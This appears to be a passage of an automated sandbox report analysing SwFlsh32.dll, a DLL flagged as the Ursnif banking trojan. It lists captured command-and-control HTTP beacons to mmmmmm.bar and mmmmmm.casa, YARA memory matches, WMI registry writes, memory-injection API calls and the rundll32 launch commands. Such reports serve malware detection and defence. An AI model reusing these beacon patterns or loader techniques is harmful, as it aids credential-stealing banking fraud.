            Source: global trafficHTTP traffic detected: GET /drew/lQpAWLPQsOn/iwi15YGVBnOQpx/ACCjrHfe7Wo0P5JvKHDja/8dIy_2F3W_2F273e/h_2BsxpS6fputhm/wuxSDq8Sf7QGBArKTZ/CdKlNGATu/ui4Mkodu0v0T4w8lKhmy/ng26rinL5x2u14eDyK_/2FNgnMT1wD4br8QPNmANVh/XK61cOpXKAAqL/6zR60_2F/4QMU_2FGCGZwdCOQ5jmMpGq/Ie0CxUzI16/H_2Fje_2FQKEcdhm_/2BUE_2FR/WxCH4QgM/jZM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/hM1upiDM4s78JFaPrfyW/3DWkoBXDYr7rgMt3xG_/2BGXIAeEHHsslby_2Fk_2B/XjQKcdsES34ik/KzZh1W9x/wGh7y7hkYjEYiRmdk8ihMRh/wEuF5klCEc/N3ieIl5msFqHpr6e_/2BAkBe5SEk4L/PqlaOJaqYp2/r_2BNxFDTfZU3N/69EGFjEgSNPlZMLVgL6hR/Ck2ZFVOto0vLvnfh/AOtKkE_2B8SZijs/JwyVbX6V5aCtPQN9rn/_2BnFCD_2/F76.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.mmmmmm.casa
            Source: global trafficHTTP traffic detected: GET /drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.mmmmmm.casa
            Source: global trafficHTTP traffic detected: GET /drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.mmmmmm.casa
            Source: global trafficHTTP traffic detected: GET /drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.mmmmmm.casa
            Source: global trafficHTTP traffic detected: GET /drew/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BPHuX8lkP85/MSE547sPVJP5Pb/uwpVWJ0_2F5KAGhPt59PK/XFYRWXuuFJDH1RPV/x9jUEqFvAJ3Kl42/dFOyZtqdeFkK81krpt/W07rXA9LO/_2FsUQUJNXTJZ08M4MsS/eUndP8BPShJYYavS5w3/OjNnZSisYNeZZTRn2Bu4BT/d35KR5_2FpO/eKZ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/X4p6u_2FetthGmAcz/bQsew8zG_2Fh/9P0GZIddIT6/tsqFDffw1JfZI9/7Wxh6S1430ERGHqXnGdSL/l2H1dC_2BJRz8P7u/WHLfWZFpRyuCPoH/N2btBoZMI6viPyh1IZ/3zpHhEkuK/H3QK2eSVqiaA4sXJAvW0/6PC2c0KwbRckfLHWg95/iUWpcL_2BkbYAUGuJiXEcw/5QgCHV4YQT1Aj/V_2FUI3k/q3ooEApLg6Zz6wvYePIaFqO/CEyO7MK.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KAsztIp/rbZR9n25d8s1swM9G24/POlK7PosNEdgyRGUG2gH4G/osPJ_2FYmTltK/5jx6Pdhk/9DHJnQIClt_2FzdZ9oWmGhV/bMMH_2BIn1/yEJsp_2FrcbHarv5V/n7FSL8uXWBw2/H_2Bf_2Fn_2/BR1KjYbSHqEZ_2/FMDrsqXqBz9zvxWljk5WA/R1oCBo4gMgLTWO4D/t_2Bn0elq/j7rqu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/QBjwt7f9IP4GJ_2FI3i/c0aa6REvsF1jEZ9Gt73OXW/MtCcAk2KHvQUZ/TFCEWwi_/2FYGGLslYtrvGnKIPgnCCn_/2Be4qngLZL/h7wQZV7ZkmYTr30Ro/f_2BtcFeUACa/x0nXv3li_2B/U9eDD3JfhJK72O/jxeUvRycWfEceGRC3MXTy/drNOOIK_2FtdvF1i/AmMumpioN5_2FP1/gKQv6LB4vbHzJub1s1/spDN5cRuN/AMK9KBM6v3hgq0vZhZSY/2SvQy6L_2F1v3G9XnYH/lj5TD.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: mmmmmm.barConnection: Keep-AliveCache-Control: no-cache

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6936, type: MEMORYSTR
            Source: loaddll32.exe, 00000000.00000002.869935510.00000000013FB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6936, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: SwFlsh32.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002244
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F81DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F6C62
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F4EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B94EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B96C62
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B981DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA4EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA6C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA81DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_10002244
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E81DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E6C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E4EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0DF7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001F61 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001077 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100012BE NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002465 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_034F8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B977BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_04B98401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00FA8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_10001077 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_100012BE NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_10001F61 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_1_10002465 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_051E8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0ABA NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F08B7 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_032F0880 NtAllocateVirtualMemory,
            Source: SwFlsh32.dllBinary or memory string: OriginalFilenameSwFlsh32.exe4 vs SwFlsh32.dll
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SwFlsh32.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
            Source: SwFlsh32.dllStatic PE information: invalid certificate
            Source: SwFlsh32.dllVirustotal: Detection: 46%
            Source: SwFlsh32.dllMetadefender: Detection: 20%
            Source: SwFlsh32.dllReversingLabs: Detection: 32%
            Source: SwFlsh32.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SwFlsh32.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
